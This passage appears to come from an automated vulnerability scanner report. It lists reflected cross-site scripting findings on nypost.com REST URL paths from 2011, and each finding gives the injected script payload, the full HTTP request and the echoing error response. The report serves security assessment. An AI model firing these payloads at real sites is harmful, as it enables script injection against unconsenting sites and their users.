<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig1d3a4<script>alert(1)</script>01077d19e02/WebPortal/nypost/blocks/fat_header/fat_header.js</p>
...[SNIP]...

1.440. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3a34f<script>alert(1)</script>fbd74a98150 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal3a34f<script>alert(1)</script>fbd74a98150/nypost/blocks/fat_header/fat_header.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:17 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal3a34f<script>alert(1)</script>fbd74a98150/nypost/blocks/fat_header/fat_header.js</p>
...[SNIP]...

1.441. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1c323<script>alert(1)</script>4097c64930c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost1c323<script>alert(1)</script>4097c64930c/blocks/fat_header/fat_header.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:19 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost1c323<script>alert(1)</script>4097c64930c/blocks/fat_header/fat_header.js</p>
...[SNIP]...

1.442. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ecd79<script>alert(1)</script>f381d8b34c2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocksecd79<script>alert(1)</script>f381d8b34c2/fat_header/fat_header.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocksecd79<script>alert(1)</script>f381d8b34c2/fat_header/fat_header.js</p>
...[SNIP]...

1.443. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 64067<script>alert(1)</script>a62c0e00a4e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/fat_header64067<script>alert(1)</script>a62c0e00a4e/fat_header.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:23 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/fat_header64067<script>alert(1)</script>a62c0e00a4e/fat_header.js</p>
...[SNIP]...

1.444. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3e10d<script>alert(1)</script>f24737f3d3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js3e10d<script>alert(1)</script>f24737f3d3 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:25 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js3e10d<script>alert(1)</script>f24737f3d3</p>
...[SNIP]...

1.445. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/markets/markets.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/markets/markets.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 78f5c<script>alert(1)</script>3cef393e6fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig78f5c<script>alert(1)</script>3cef393e6fe/WebPortal/nypost/blocks/markets/markets.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:29 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig78f5c<script>alert(1)</script>3cef393e6fe/WebPortal/nypost/blocks/markets/markets.js</p>
...[SNIP]...

1.446. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/markets/markets.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/markets/markets.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 954de<script>alert(1)</script>6f944906a17 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal954de<script>alert(1)</script>6f944906a17/nypost/blocks/markets/markets.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:31 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal954de<script>alert(1)</script>6f944906a17/nypost/blocks/markets/markets.js</p>
...[SNIP]...

1.447. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/markets/markets.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/markets/markets.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 14e70<script>alert(1)</script>d0098b87a7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost14e70<script>alert(1)</script>d0098b87a7/blocks/markets/markets.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 710
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:36 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost14e70<script>alert(1)</script>d0098b87a7/blocks/markets/markets.js</p>
...[SNIP]...

1.448. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/markets/markets.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/markets/markets.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 15ba4<script>alert(1)</script>76213674490 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks15ba4<script>alert(1)</script>76213674490/markets/markets.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:41 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks15ba4<script>alert(1)</script>76213674490/markets/markets.js</p>
...[SNIP]...

1.449. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/markets/markets.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/markets/markets.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b2052<script>alert(1)</script>324e5de0974 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/marketsb2052<script>alert(1)</script>324e5de0974/markets.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:45 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/marketsb2052<script>alert(1)</script>324e5de0974/markets.js</p>
...[SNIP]...

1.450. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/markets/markets.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/markets/markets.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c3ca5<script>alert(1)</script>159526d3663 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/markets/markets.jsc3ca5<script>alert(1)</script>159526d3663 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:47 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/markets/markets.jsc3ca5<script>alert(1)</script>159526d3663</p>
...[SNIP]...

1.451. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload abe04<script>alert(1)</script>34ac36cff1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfigabe04<script>alert(1)</script>34ac36cff1c/WebPortal/nypost/blocks/masthead/last_updated.htm HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 718
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:18 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigabe04<script>alert(1)</script>34ac36cff1c/WebPortal/nypost/blocks/masthead/last_updated.htm</p>
...[SNIP]...

1.452. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htm

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 40e1c<script>alert(1)</script>69d7103355d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal40e1c<script>alert(1)</script>69d7103355d/nypost/blocks/masthead/last_updated.htm HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 718
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal40e1c<script>alert(1)</script>69d7103355d/nypost/blocks/masthead/last_updated.htm</p>
...[SNIP]...

1.453. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htm

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b3350<script>alert(1)</script>acc34c7bdea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostb3350<script>alert(1)</script>acc34c7bdea/blocks/masthead/last_updated.htm HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 718
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:35 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostb3350<script>alert(1)</script>acc34c7bdea/blocks/masthead/last_updated.htm</p>
...[SNIP]...

1.454. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htm

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c2bab<script>alert(1)</script>071c8535c3a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocksc2bab<script>alert(1)</script>071c8535c3a/masthead/last_updated.htm HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 718
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:37 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocksc2bab<script>alert(1)</script>071c8535c3a/masthead/last_updated.htm</p>
...[SNIP]...

1.455. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htm

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 53749<script>alert(1)</script>fc5c8eb1611 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/masthead53749<script>alert(1)</script>fc5c8eb1611/last_updated.htm HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 718
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:39 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/masthead53749<script>alert(1)</script>fc5c8eb1611/last_updated.htm</p>
...[SNIP]...

1.456. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htm

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b5752<script>alert(1)</script>9d2d05dbc3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htmb5752<script>alert(1)</script>9d2d05dbc3 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:41 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
